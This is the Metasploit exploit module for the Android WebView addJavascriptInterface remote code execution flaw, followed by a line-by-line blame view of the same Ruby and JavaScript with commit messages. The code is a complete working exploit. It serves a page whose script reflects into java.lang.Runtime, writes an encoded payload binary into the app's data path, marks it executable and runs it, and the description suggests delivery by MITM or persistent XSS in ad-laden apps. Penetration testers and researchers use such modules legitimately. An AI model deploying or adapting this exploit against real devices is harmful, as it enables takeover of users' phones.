metasploit-framework/modules/exploits/android/browser/webview_addjavascriptinterf...

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :os_flavor  => "Android",
    :arch       => ARCH_ARMLE,
    :javascript => true,
    :rank       => ExcellentRanking,
    :vuln_test  => %Q|
      for (i in top) {
        try {
          top[i].getClass().forName('java.lang.Runtime');
          is_vuln = true; break;
        } catch(e) {}
      }
    |
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Android Browser and WebView addJavascriptInterface Code Execution',
      'Description' => %q{
            This module exploits a privilege escalation issue in Android < 4.2's WebView component
          that arises when untrusted Javascript code is executed by a WebView that has one or more
          Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
          APIs exposed by the Interface and execute arbitrary commands.

          Some distributions of the Android Browser app have an addJavascriptInterface
          call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs
          4.1.2 release of Android is known to be vulnerable.

          A secondary attack vector involves the WebViews embedded inside a large number
          of Android applications. Ad integrations are perhaps the worst offender here.
          If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS
          into the page displayed in the WebView, then you can inject the html/js served
          by this module and get a shell.

          Note: Adding a .js to the URL will return plain javascript (no HTML markup).
      },
      'License'     => MSF_LICENSE,
      'Author'      => [
        'jduck', # original msf module
        'joev'   # static server
      ],
      'References'     => [
        ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
        ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
        ['URL', 'http://50.56.33.56/blog/?p=314'],
        ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
        ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
      ],
      'Platform'       => 'linux',
      'Arch'           => ARCH_ARMLE,
      'DefaultOptions' => { 'PrependFork' => true },
      'Targets'        => [ [ 'Automatic', {} ] ],
      'DisclosureDate' => 'Dec 21 2012',
      'DefaultTarget'  => 0,
      'BrowserRequirements' => {
        :source  => 'script',
        :os_flavor  => "Android",
        :arch       => ARCH_ARMLE
      }
    ))
  end

  def on_request_uri(cli, req)
    if req.uri.end_with?('js')
      print_status("Serving javascript")
      send_response(cli, js, 'Content-type' => 'text/javascript')
    else
      super
    end
  end

  def on_request_exploit(cli, req, browser)
    print_status("Serving exploit HTML")
    send_response_html(cli, html)
  end

  def js
    %Q|
      function exec(obj) {
        // ensure that the object contains a native interface
        try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }

        // get the runtime so we can exec
        var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
        var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";

        // get the process name, which will give us our data path
        var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
        var ch, path = '/data/data/';
        while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
        path += '/#{Rex::Text.rand_text_alpha(8)}';

        // build the binary, chmod it, and execute it
        m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
        m.invoke(null, null).exec(['chmod', '700', path]).waitFor();
        m.invoke(null, null).exec([path]);

        return true;
      }

      for (i in top) { if (exec(top[i]) === true) break; }
    |
  end

  def html
    "<!doctype html><html><body><script>#{js}</script></body></html>"
  end
end
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`

Use BrowserExploitServer mixin. This prevents drive-by users on other browsers from ever receiving the exploit contents. 2014-02-06 17:32:42 +00:00			`include Msf::Exploit::Remote::BrowserExploitServer`
Add browserautopwn support. 2014-02-04 08:32:12 +00:00			`include Msf::Exploit::Remote::BrowserAutopwn`

			`autopwn_info({`
			`:os_flavor => "Android",`
			`:arch => ARCH_ARMLE,`
			`:javascript => true,`
			`:rank => ExcellentRanking,`
			`:vuln_test => %Q\|`
			`for (i in top) {`
			`try {`
Tweak checks. 2014-02-04 08:49:07 +00:00			`top[i].getClass().forName('java.lang.Runtime');`
Add browserautopwn support. 2014-02-04 08:32:12 +00:00			`is_vuln = true; break;`
			`} catch(e) {}`
			`}`
			`\|`
			`})`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
Msftidy it up. 2014-02-04 20:24:36 +00:00			`'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`'Description' => %q{`
Msftidy it up. 2014-02-04 20:24:36 +00:00			`This module exploits a privilege escalation issue in Android < 4.2's WebView component`
			`that arises when untrusted Javascript code is executed by a WebView that has one or more`
Tweak description. 2014-02-04 08:47:49 +00:00			`Interfaces added to it. The untrusted Javascript code can call into the Java Reflection`
			`APIs exposed by the Interface and execute arbitrary commands.`

			`Some distributions of the Android Browser app have an addJavascriptInterface`
			`call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs`
Tweak checks. 2014-02-04 08:49:07 +00:00			`4.1.2 release of Android is known to be vulnerable.`
Tweak description. 2014-02-04 08:47:49 +00:00
			`A secondary attack vector involves the WebViews embedded inside a large number`
			`of Android applications. Ad integrations are perhaps the worst offender here.`
Wording tweak. 2014-02-04 08:55:10 +00:00			`If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS`
Tweak description. 2014-02-04 08:47:49 +00:00			`into the page displayed in the WebView, then you can inject the html/js served`
			`by this module and get a shell.`
More accurate description. 2014-02-04 07:44:39 +00:00
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`Note: Adding a .js to the URL will return plain javascript (no HTML markup).`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
			`'jduck', # original msf module`
Remove @nmonkee as author per twitter convo 2014-02-13 20:41:10 +00:00			`'joev' # static server`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`],`
			`'References' => [`
Unbreak the URL refs add nmonkee as ref and author While @nmonkee didn't actually contribute to #2942, he did publish a python exploit that leverages WebView, so given our policy of being loose with author credit, I added him. Also added a ref to @nmonkee's thing. @jduck @jvennix-r7 if you have a problem with this, please do say so, I don't think adding @nmonkee in any way diminishes your work, and I don't want to appear like we're secretly ripping off people's work. I know you aren't on this or any other module, and I know @nmonkee doesn't think that either. 2014-02-13 20:19:59 +00:00			`['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],`
			`['URL', 'http://50.56.33.56/blog/?p=314'],`
Unbreak the URL refs add nmonkee as ref and author While @nmonkee didn't actually contribute to #2942, he did publish a python exploit that leverages WebView, so given our policy of being loose with author credit, I added him. Also added a ref to @nmonkee's thing. @jduck @jvennix-r7 if you have a problem with this, please do say so, I don't think adding @nmonkee in any way diminishes your work, and I don't want to appear like we're secretly ripping off people's work. I know you aren't on this or any other module, and I know @nmonkee doesn't think that either. 2014-02-13 20:19:59 +00:00			`['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],`
			`['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`],`
			`'Platform' => 'linux',`
			`'Arch' => ARCH_ARMLE,`
			`'DefaultOptions' => { 'PrependFork' => true },`
			`'Targets' => [ [ 'Automatic', {} ] ],`
			`'DisclosureDate' => 'Dec 21 2012',`
Use BrowserExploitServer mixin. This prevents drive-by users on other browsers from ever receiving the exploit contents. 2014-02-06 17:32:42 +00:00			`'DefaultTarget' => 0,`
			`'BrowserRequirements' => {`
			`:source => 'script',`
			`:os_flavor => "Android",`
			`:arch => ARCH_ARMLE`
			`}`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`))`
			`end`

			`def on_request_uri(cli, req)`
			`if req.uri.end_with?('js')`
			`print_status("Serving javascript")`
			`send_response(cli, js, 'Content-type' => 'text/javascript')`
			`else`
Use BrowserExploitServer mixin. This prevents drive-by users on other browsers from ever receiving the exploit contents. 2014-02-06 17:32:42 +00:00			`super`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`end`
			`end`

Use BrowserExploitServer mixin. This prevents drive-by users on other browsers from ever receiving the exploit contents. 2014-02-06 17:32:42 +00:00			`def on_request_exploit(cli, req, browser)`
			`print_status("Serving exploit HTML")`
			`send_response_html(cli, html)`
			`end`

Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`def js`
			`%Q\|`
Add browserautopwn support. 2014-02-04 08:32:12 +00:00			`function exec(obj) {`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`// ensure that the object contains a native interface`
Tweak checks. 2014-02-04 08:49:07 +00:00			`try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00
			`// get the runtime so we can exec`
			`var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);`
			`var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";`
Msftidy it up. 2014-02-04 20:24:36 +00:00
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`// get the process name, which will give us our data path`
Whitespace tweaks. 2014-02-04 08:52:52 +00:00			`var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`var ch, path = '/data/data/';`
			`while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }`
			`path += '/#{Rex::Text.rand_text_alpha(8)}';`

			`// build the binary, chmod it, and execute it`
Whitespace tweaks. 2014-02-04 08:52:52 +00:00			`m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();`
			`m.invoke(null, null).exec(['chmod', '700', path]).waitFor();`
			`m.invoke(null, null).exec([path]);`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00
			`return true;`
			`}`

Add browserautopwn support. 2014-02-04 08:32:12 +00:00			`for (i in top) { if (exec(top[i]) === true) break; }`
Add webview HTTP exploit. 2014-02-04 07:37:09 +00:00			`\|`
			`end`

			`def html`
			`"<!doctype html><html><body><script>#{js}</script></body></html>"`
			`end`
			`end`